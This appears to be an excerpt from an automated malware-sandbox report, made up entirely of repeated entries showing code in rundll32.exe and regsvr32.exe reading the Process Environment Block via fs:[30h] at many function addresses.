Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDF1D60 mov eax, dword ptr fs:[00000030h] 13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDEBB90 mov edx, dword ptr fs:[00000030h] 13_2_7EDEBB90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDC86E2 mov eax, dword ptr fs:[00000030h] 13_2_7EDC86E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDE8780 mov edx, dword ptr fs:[00000030h] 13_2_7EDE8780
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDDC4F0 mov ecx, dword ptr fs:[00000030h] 13_2_7EDDC4F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDEE5D0 mov ecx, dword ptr fs:[00000030h] 13_2_7EDEE5D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDEC060 mov ecx, dword ptr fs:[00000030h] 13_2_7EDEC060
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDFE179 mov ecx, dword ptr fs:[00000030h] 13_2_7EDFE179
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB4EF1 mov edx, dword ptr fs:[00000030h] 13_2_7EDB4EF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDF5EAD mov ecx, dword ptr fs:[00000030h] 13_2_7EDF5EAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDFEE57 mov ecx, dword ptr fs:[00000030h] 13_2_7EDFEE57
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EE19E7B mov eax, dword ptr fs:[00000030h] 13_2_7EE19E7B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EE19E06 mov eax, dword ptr fs:[00000030h] 13_2_7EE19E06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDBAE34 mov edx, dword ptr fs:[00000030h] 13_2_7EDBAE34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDF5E22 mov ecx, dword ptr fs:[00000030h] 13_2_7EDF5E22
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB3FF4 mov edx, dword ptr fs:[00000030h] 13_2_7EDB3FF4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB3FF4 mov ecx, dword ptr fs:[00000030h] 13_2_7EDB3FF4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB6FE0 mov edx, dword ptr fs:[00000030h] 13_2_7EDB6FE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB3F90 mov edx, dword ptr fs:[00000030h] 13_2_7EDB3F90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB3F90 mov ecx, dword ptr fs:[00000030h] 13_2_7EDB3F90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDFEF8D mov ecx, dword ptr fs:[00000030h] 13_2_7EDFEF8D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB9FB1 mov edx, dword ptr fs:[00000030h] 13_2_7EDB9FB1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDC5F40 mov edx, dword ptr fs:[00000030h] 13_2_7EDC5F40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDC5F40 mov eax, dword ptr fs:[00000030h] 13_2_7EDC5F40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDBEF70 mov eax, dword ptr fs:[00000030h] 13_2_7EDBEF70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDE7F30 mov ecx, dword ptr fs:[00000030h] 13_2_7EDE7F30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDE7F30 mov eax, dword ptr fs:[00000030h] 13_2_7EDE7F30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB6C2A mov eax, dword ptr fs:[00000030h] 13_2_7EDB6C2A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDD1C20 mov eax, dword ptr fs:[00000030h] 13_2_7EDD1C20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDD1C20 mov edx, dword ptr fs:[00000030h] 13_2_7EDD1C20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDEADB0 mov ecx, dword ptr fs:[00000030h] 13_2_7EDEADB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDEADB0 mov eax, dword ptr fs:[00000030h] 13_2_7EDEADB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDEADB0 mov edx, dword ptr fs:[00000030h] 13_2_7EDEADB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDDAD50 mov ecx, dword ptr fs:[00000030h] 13_2_7EDDAD50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDD1D44 mov eax, dword ptr fs:[00000030h] 13_2_7EDD1D44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDEBD70 mov eax, dword ptr fs:[00000030h] 13_2_7EDEBD70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDBAD3D mov edx, dword ptr fs:[00000030h] 13_2_7EDBAD3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDBAADF mov edx, dword ptr fs:[00000030h] 13_2_7EDBAADF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDCAAE0 mov ecx, dword ptr fs:[00000030h] 13_2_7EDCAAE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EE01A50 mov eax, dword ptr fs:[00000030h] 13_2_7EE01A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDD7A11 mov eax, dword ptr fs:[00000030h] 13_2_7EDD7A11
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB6B90 mov eax, dword ptr fs:[00000030h] 13_2_7EDB6B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDEBB80 mov eax, dword ptr fs:[00000030h] 13_2_7EDEBB80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDFEB49 mov ecx, dword ptr fs:[00000030h] 13_2_7EDFEB49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDE9B40 mov eax, dword ptr fs:[00000030h] 13_2_7EDE9B40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDD38EC mov eax, dword ptr fs:[00000030h] 13_2_7EDD38EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDD78EC mov eax, dword ptr fs:[00000030h] 13_2_7EDD78EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDD78EC mov ecx, dword ptr fs:[00000030h] 13_2_7EDD78EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDD78EC mov edx, dword ptr fs:[00000030h] 13_2_7EDD78EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDF698D mov ecx, dword ptr fs:[00000030h] 13_2_7EDF698D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB6980 mov edx, dword ptr fs:[00000030h] 13_2_7EDB6980
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDF6902 mov ecx, dword ptr fs:[00000030h] 13_2_7EDF6902
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDE8930 mov eax, dword ptr fs:[00000030h] 13_2_7EDE8930
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDD56B2 mov eax, dword ptr fs:[00000030h] 13_2_7EDD56B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDBA6A2 mov edx, dword ptr fs:[00000030h] 13_2_7EDBA6A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDFE7CE mov ecx, dword ptr fs:[00000030h] 13_2_7EDFE7CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDC87E6 mov eax, dword ptr fs:[00000030h] 13_2_7EDC87E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDD0745 mov eax, dword ptr fs:[00000030h] 13_2_7EDD0745
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDBA72C mov edx, dword ptr fs:[00000030h] 13_2_7EDBA72C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB44E4 mov ecx, dword ptr fs:[00000030h] 13_2_7EDB44E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB44E4 mov edx, dword ptr fs:[00000030h] 13_2_7EDB44E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB8440 mov edx, dword ptr fs:[00000030h] 13_2_7EDB8440
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB8440 mov ecx, dword ptr fs:[00000030h] 13_2_7EDB8440
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDE7460 mov eax, dword ptr fs:[00000030h] 13_2_7EDE7460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDBE41E mov edx, dword ptr fs:[00000030h] 13_2_7EDBE41E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDBE41E mov eax, dword ptr fs:[00000030h] 13_2_7EDBE41E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDBA415 mov edx, dword ptr fs:[00000030h] 13_2_7EDBA415
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDD558D mov eax, dword ptr fs:[00000030h] 13_2_7EDD558D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDD558D mov ecx, dword ptr fs:[00000030h] 13_2_7EDD558D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDD558D mov edx, dword ptr fs:[00000030h] 13_2_7EDD558D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB5542 mov ecx, dword ptr fs:[00000030h] 13_2_7EDB5542
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB5542 mov eax, dword ptr fs:[00000030h] 13_2_7EDB5542
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDC6540 mov eax, dword ptr fs:[00000030h] 13_2_7EDC6540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDBA2E1 mov edx, dword ptr fs:[00000030h] 13_2_7EDBA2E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDBE090 mov edx, dword ptr fs:[00000030h] 13_2_7EDBE090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F79EF70 mov eax, dword ptr fs:[00000030h] 18_2_7F79EF70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7A5F40 mov edx, dword ptr fs:[00000030h] 18_2_7F7A5F40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7A5F40 mov eax, dword ptr fs:[00000030h] 18_2_7F7A5F40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7C7F30 mov ecx, dword ptr fs:[00000030h] 18_2_7F7C7F30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7C7F30 mov eax, dword ptr fs:[00000030h] 18_2_7F7C7F30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7B0FF0 mov edx, dword ptr fs:[00000030h] 18_2_7F7B0FF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7B0FF0 mov ecx, dword ptr fs:[00000030h] 18_2_7F7B0FF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7B0FF0 mov eax, dword ptr fs:[00000030h] 18_2_7F7B0FF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F793FF4 mov edx, dword ptr fs:[00000030h] 18_2_7F793FF4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F793FF4 mov ecx, dword ptr fs:[00000030h] 18_2_7F793FF4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F796FE0 mov edx, dword ptr fs:[00000030h] 18_2_7F796FE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F793F90 mov edx, dword ptr fs:[00000030h] 18_2_7F793F90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F793F90 mov ecx, dword ptr fs:[00000030h] 18_2_7F793F90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7F9E7B mov eax, dword ptr fs:[00000030h] 18_2_7F7F9E7B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7F9E4A mov eax, dword ptr fs:[00000030h] 18_2_7F7F9E4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7F9E06 mov eax, dword ptr fs:[00000030h] 18_2_7F7F9E06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7CBD70 mov eax, dword ptr fs:[00000030h] 18_2_7F7CBD70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7BAD50 mov ecx, dword ptr fs:[00000030h] 18_2_7F7BAD50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7B6D40 mov eax, dword ptr fs:[00000030h] 18_2_7F7B6D40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7B6D40 mov edx, dword ptr fs:[00000030h] 18_2_7F7B6D40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7B6D40 mov ecx, dword ptr fs:[00000030h] 18_2_7F7B6D40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7CADB0 mov ecx, dword ptr fs:[00000030h] 18_2_7F7CADB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7CADB0 mov eax, dword ptr fs:[00000030h] 18_2_7F7CADB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7CADB0 mov edx, dword ptr fs:[00000030h] 18_2_7F7CADB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7F2C38 mov ecx, dword ptr fs:[00000030h] 18_2_7F7F2C38
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7C8C30 mov ecx, dword ptr fs:[00000030h] 18_2_7F7C8C30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7C8C30 mov eax, dword ptr fs:[00000030h] 18_2_7F7C8C30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7C8C30 mov edx, dword ptr fs:[00000030h] 18_2_7F7C8C30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F796C2A mov eax, dword ptr fs:[00000030h] 18_2_7F796C2A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7C9B40 mov eax, dword ptr fs:[00000030h] 18_2_7F7C9B40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F796B90 mov eax, dword ptr fs:[00000030h] 18_2_7F796B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7CBB90 mov edx, dword ptr fs:[00000030h] 18_2_7F7CBB90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7CBB80 mov eax, dword ptr fs:[00000030h] 18_2_7F7CBB80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7E1A50 mov eax, dword ptr fs:[00000030h] 18_2_7F7E1A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7AAAE0 mov ecx, dword ptr fs:[00000030h] 18_2_7F7AAAE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7C8930 mov eax, dword ptr fs:[00000030h] 18_2_7F7C8930
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F796980 mov edx, dword ptr fs:[00000030h] 18_2_7F796980
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7D5760 mov ecx, dword ptr fs:[00000030h] 18_2_7F7D5760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7D5760 mov edx, dword ptr fs:[00000030h] 18_2_7F7D5760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7D5760 mov eax, dword ptr fs:[00000030h] 18_2_7F7D5760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7C8780 mov edx, dword ptr fs:[00000030h] 18_2_7F7C8780
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7AF690 mov ecx, dword ptr fs:[00000030h] 18_2_7F7AF690
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7AF690 mov eax, dword ptr fs:[00000030h] 18_2_7F7AF690
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7A6540 mov eax, dword ptr fs:[00000030h] 18_2_7F7A6540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7CE5D0 mov ecx, dword ptr fs:[00000030h] 18_2_7F7CE5D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7C7460 mov eax, dword ptr fs:[00000030h] 18_2_7F7C7460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F798440 mov edx, dword ptr fs:[00000030h] 18_2_7F798440
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F798440 mov ecx, dword ptr fs:[00000030h] 18_2_7F798440
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7BC4F0 mov ecx, dword ptr fs:[00000030h] 18_2_7F7BC4F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7944E4 mov ecx, dword ptr fs:[00000030h] 18_2_7F7944E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7944E4 mov edx, dword ptr fs:[00000030h] 18_2_7F7944E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7D6240 mov ecx, dword ptr fs:[00000030h] 18_2_7F7D6240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7D6240 mov edx, dword ptr fs:[00000030h] 18_2_7F7D6240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7D6240 mov eax, dword ptr fs:[00000030h] 18_2_7F7D6240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7CC060 mov ecx, dword ptr fs:[00000030h] 18_2_7F7CC060
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_6B4FD480 mov eax, dword ptr fs:[00000030h] 36_2_6B4FD480
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F107F30 mov ecx, dword ptr fs:[00000030h] 36_2_7F107F30
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F107F30 mov eax, dword ptr fs:[00000030h] 36_2_7F107F30
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0E5F40 mov edx, dword ptr fs:[00000030h] 36_2_7F0E5F40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0E5F40 mov eax, dword ptr fs:[00000030h] 36_2_7F0E5F40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F115760 mov ecx, dword ptr fs:[00000030h] 36_2_7F115760
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F115760 mov edx, dword ptr fs:[00000030h] 36_2_7F115760
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F115760 mov eax, dword ptr fs:[00000030h] 36_2_7F115760
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0DEF70 mov eax, dword ptr fs:[00000030h] 36_2_7F0DEF70
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F108780 mov edx, dword ptr fs:[00000030h] 36_2_7F108780
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0D3F90 mov edx, dword ptr fs:[00000030h] 36_2_7F0D3F90
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0D3F90 mov ecx, dword ptr fs:[00000030h] 36_2_7F0D3F90
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0D6FE0 mov edx, dword ptr fs:[00000030h] 36_2_7F0D6FE0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0D3FF4 mov edx, dword ptr fs:[00000030h] 36_2_7F0D3FF4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0D3FF4 mov ecx, dword ptr fs:[00000030h] 36_2_7F0D3FF4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F0FF0 mov edx, dword ptr fs:[00000030h] 36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F0FF0 mov ecx, dword ptr fs:[00000030h] 36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F0FF0 mov eax, dword ptr fs:[00000030h] 36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F0FF0 mov eax, dword ptr fs:[00000030h] 36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F0FF0 mov eax, dword ptr fs:[00000030h] 36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F0FF0 mov eax, dword ptr fs:[00000030h] 36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F0FF0 mov eax, dword ptr fs:[00000030h] 36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F0FF0 mov edx, dword ptr fs:[00000030h] 36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F0FF0 mov eax, dword ptr fs:[00000030h] 36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F139E06 mov eax, dword ptr fs:[00000030h] 36_2_7F139E06
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F139E7B mov eax, dword ptr fs:[00000030h] 36_2_7F139E7B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0EF690 mov ecx, dword ptr fs:[00000030h] 36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0EF690 mov ecx, dword ptr fs:[00000030h] 36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h] 36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h] 36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h] 36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h] 36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h] 36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h] 36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h] 36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0E6540 mov eax, dword ptr fs:[00000030h] 36_2_7F0E6540
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h] 36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F6D40 mov edx, dword ptr fs:[00000030h] 36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h] 36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h] 36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h] 36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h] 36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h] 36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F6D40 mov ecx, dword ptr fs:[00000030h] 36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F6D40 mov edx, dword ptr fs:[00000030h] 36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h] 36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0FAD50 mov ecx, dword ptr fs:[00000030h] 36_2_7F0FAD50
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F10BD70 mov eax, dword ptr fs:[00000030h] 36_2_7F10BD70
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F10ADB0 mov ecx, dword ptr fs:[00000030h] 36_2_7F10ADB0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F10ADB0 mov eax, dword ptr fs:[00000030h] 36_2_7F10ADB0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F10ADB0 mov ecx, dword ptr fs:[00000030h] 36_2_7F10ADB0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F10ADB0 mov edx, dword ptr fs:[00000030h] 36_2_7F10ADB0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F10ADB0 mov eax, dword ptr fs:[00000030h] 36_2_7F10ADB0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F10E5D0 mov ecx, dword ptr fs:[00000030h] 36_2_7F10E5D0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F108C30 mov ecx, dword ptr fs:[00000030h] 36_2_7F108C30
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F108C30 mov eax, dword ptr fs:[00000030h] 36_2_7F108C30
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F108C30 mov edx, dword ptr fs:[00000030h] 36_2_7F108C30
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F108C30 mov eax, dword ptr fs:[00000030h] 36_2_7F108C30
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F108C30 mov ecx, dword ptr fs:[00000030h] 36_2_7F108C30
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0D6C2A mov eax, dword ptr fs:[00000030h] 36_2_7F0D6C2A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0D8440 mov edx, dword ptr fs:[00000030h] 36_2_7F0D8440
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0D8440 mov ecx, dword ptr fs:[00000030h] 36_2_7F0D8440
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0D8440 mov ecx, dword ptr fs:[00000030h] 36_2_7F0D8440
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F107460 mov eax, dword ptr fs:[00000030h] 36_2_7F107460
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0D44E4 mov ecx, dword ptr fs:[00000030h] 36_2_7F0D44E4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0D44E4 mov ecx, dword ptr fs:[00000030h] 36_2_7F0D44E4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0D44E4 mov edx, dword ptr fs:[00000030h] 36_2_7F0D44E4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0FC4F0 mov ecx, dword ptr fs:[00000030h] 36_2_7F0FC4F0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F109B40 mov eax, dword ptr fs:[00000030h] 36_2_7F109B40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F10BB90 mov edx, dword ptr fs:[00000030h] 36_2_7F10BB90
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F10BB80 mov eax, dword ptr fs:[00000030h] 36_2_7F10BB80
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0D6B90 mov eax, dword ptr fs:[00000030h] 36_2_7F0D6B90
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F121A50 mov eax, dword ptr fs:[00000030h] 36_2_7F121A50
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F116240 mov ecx, dword ptr fs:[00000030h] 36_2_7F116240
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F116240 mov edx, dword ptr fs:[00000030h] 36_2_7F116240
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F116240 mov eax, dword ptr fs:[00000030h] 36_2_7F116240
